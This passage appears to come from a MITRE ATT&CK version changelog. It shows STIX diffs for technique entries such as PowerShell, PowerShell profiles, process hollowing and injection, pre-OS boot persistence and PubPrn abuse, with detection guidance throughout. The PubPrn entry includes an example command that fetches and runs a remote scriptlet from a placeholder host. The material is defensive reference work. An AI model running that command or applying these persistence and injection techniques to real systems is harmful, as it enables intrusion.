technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. |
| external_references[1]['source_name'] | AddMonitor | Bloxham |
| external_references[1]['description'] | Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014. | Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014. |
| external_references[1]['url'] | http://msdn.microsoft.com/en-us/library/dd183341 | https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf |
| external_references[2]['source_name'] | Bloxham | AddMonitor |
| external_references[2]['description'] | Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014. | Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014. |
| external_references[2]['url'] | https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf | http://msdn.microsoft.com/en-us/library/dd183341 |
| x_mitre_detection | Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.<br>Monitor Registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns) | Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.<br>Monitor Registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns) |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) | Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).<br>PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.<br>A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)<br>PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-28 14:56:23.748000+00:00 | 2022-04-19 20:25:48.646000+00:00 |
| description | Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).<br>PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.<br>A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)<br>PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) | Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).<br>PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.<br>A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)<br>PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) |
| external_references[1]['source_name'] | TechNet PowerShell | Microsoft PSfromCsharp APR 2014 |
| external_references[1]['description'] | Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016. | Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx | https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/ |
| external_references[2]['source_name'] | Github PSAttack | SilentBreak Offensive PS Dec 2015 |
| external_references[2]['description'] | Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016. | Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018. |
| external_references[2]['url'] | https://github.com/jaredhaight/PSAttack | https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/ |
| external_references[3]['source_name'] | Sixdub PowerPick Jan 2016 | FireEye PowerShell Logging 2016 |
| external_references[3]['description'] | Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018. | Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016. |
| external_references[3]['url'] | http://www.sixdub.net/?p=367 | https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html |
| external_references[4]['source_name'] | SilentBreak Offensive PS Dec 2015 | Github PSAttack |
| external_references[4]['description'] | Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018. | Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016. |
| external_references[4]['url'] | https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/ | https://github.com/jaredhaight/PSAttack |
| external_references[5]['source_name'] | Microsoft PSfromCsharp APR 2014 | inv_ps_attacks |
| external_references[5]['description'] | Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019. | Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021. |
| external_references[5]['url'] | https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/ | https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/ |
| external_references[7]['source_name'] | FireEye PowerShell Logging 2016 | TechNet PowerShell |
| external_references[7]['description'] | Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016. | Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016. |
| external_references[7]['url'] | https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html | https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx |
| x_mitre_data_sources[0] | Command: Command Execution | Script: Script Execution |
| x_mitre_data_sources[1] | Module: Module Load | Command: Command Execution |
| x_mitre_data_sources[2] | Process: Process Creation | Process: Process Metadata |
| x_mitre_data_sources[3] | Script: Script Execution | Process: Process Creation |
| x_mitre_detection | If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. | If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.<br>Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)<br>It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.<br>Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Sixdub PowerPick Jan 2016', 'description': 'Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.', 'url': 'http://www.sixdub.net/?p=367'} | |
| x_mitre_contributors | Mayuresh Dani, Qualys | |
| x_mitre_data_sources | Module: Module Load |
| Description |
|---|
| Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.<br>[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)<br>Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)<br>An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 21:31:31.082000+00:00 | 2022-02-08 16:39:08.851000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Modification |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Creation |
| x_mitre_data_sources[2] | File: File Modification | Command: Command Execution |
| x_mitre_data_sources[3] | File: File Creation | Process: Process Creation |
| x_mitre_detection | Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:<br>* $PsHome\Profile.ps1<br>* $PsHome\Microsoft.{HostProgram}_profile.ps1<br>* $Home\My Documents\PowerShell\Profile.ps1<br>* $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1<br>Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. | Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet)(Citation: Microsoft Profiles) Example profile locations (user defaults as well as program-specific) include:<br>* $PsHome\Profile.ps1<br>* $PsHome\Microsoft.{HostProgram}_profile.ps1<br>* $Home\\\[My ]Documents\PowerShell\Profile.ps1<br>* $Home\\\[My ]Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1<br>Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft Profiles', 'description': 'Microsoft. (2021, September 27). about_Profiles. Retrieved February 4, 2022.', 'url': 'https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles'} | |
| x_mitre_contributors | Matthew Green |
| Description |
|---|
| Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting) Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-22 16:35:54.740000+00:00 | 2022-04-19 02:50:42.074000+00:00 |
| external_references[1]['source_name'] | Wikipedia Booting | ITWorld Hard Disk Health Dec 2014 |
| external_references[1]['description'] | Wikipedia. (n.d.). Booting. Retrieved November 13, 2019. | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Booting | https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html |
| external_references[2]['source_name'] | ITWorld Hard Disk Health Dec 2014 | Wikipedia Booting |
| external_references[2]['description'] | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018. | Wikipedia. (n.d.). Booting. Retrieved November 13, 2019. |
| external_references[2]['url'] | https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html | https://en.wikipedia.org/wiki/Booting |
| x_mitre_data_sources[0] | Command: Command Execution | Driver: Driver Metadata |
| x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Process: OS API Execution |
| x_mitre_data_sources[2] | Firmware: Firmware Modification | Drive: Drive Modification |
| x_mitre_data_sources[3] | Driver: Driver Metadata | Command: Command Execution |
| x_mitre_data_sources[4] | Process: OS API Execution | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[5] | Drive: Drive Modification | Firmware: Firmware Modification |
| x_mitre_detection | Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014) | Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | macOS |
| Description |
|---|
| Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.
Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the process's primary thread. At this point the process can be unmapped using API calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)
This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context of) the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 12:30:14.640000+00:00 | 2021-11-29 17:22:32.704000+00:00 |
| x_mitre_data_sources[0] | Process: Process Modification | Process: Process Access |
| x_mitre_data_sources[2] | Process: Process Access | Process: Process Modification |
| x_mitre_detection | Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. |
Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Process hollowing commonly involves spawning an otherwise benign victim process. Consider correlating detections of processes created in a suspended state (ex: through API flags or process’ thread metadata) with other malicious activity such as attempts to modify a process' memory, especially by its parent process, or other abnormal process behavior.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Nviso Spoof Command Line 2020', 'description': 'Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.', 'url': 'https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/'} | |
| external_references | {'source_name': 'Mandiant Endpoint Evading 2019', 'description': 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.', 'url': 'https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode'} |
| Description |
|---|
| Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017. | |
| external_references | https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing | |
| external_references | CAPEC-640 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-640 | |
| external_references | https://www.gnu.org/software/acct/ | |
| external_references | Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 12:30:14.852000+00:00 | 2022-10-18 20:58:50.105000+00:00 |
| external_references[1]['source_name'] | capec | GNU Acct |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/640.html | https://www.gnu.org/software/acct/ |
| external_references[3]['source_name'] | ArtOfMemoryForensics | RHEL auditd |
| external_references[3]['description'] | Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017. | Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. |
| external_references[4]['source_name'] | GNU Acct | ArtOfMemoryForensics |
| external_references[4]['description'] | GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017. | Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017. |
| external_references[5]['source_name'] | RHEL auditd | Microsoft Sysmon v6 May 2017 |
| external_references[5]['description'] | Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. | Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017. |
| external_references[5]['url'] | https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing | https://docs.microsoft.com/sysinternals/downloads/sysmon |
| external_references[7]['source_name'] | Microsoft Sysmon v6 May 2017 | capec |
| external_references[7]['url'] | https://docs.microsoft.com/sysinternals/downloads/sysmon | https://capec.mitre.org/data/definitions/640.html |
| x_mitre_data_sources[1] | Module: Module Load | File: File Metadata |
| x_mitre_data_sources[6] | File: File Modification | Module: Module Load |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Modification | |
| x_mitre_data_sources | Process: Process Metadata |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Metadata |
| Old Description | New Description |
|---|---|
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn) Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script. In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). |
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-01 00:57:01.161000+00:00 | 2022-04-18 14:55:35.817000+00:00 |
| description | Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). |
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). |
| x_mitre_version | 1.1 | 2.0 |
| Old Description | New Description |
|---|---|
Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence). |
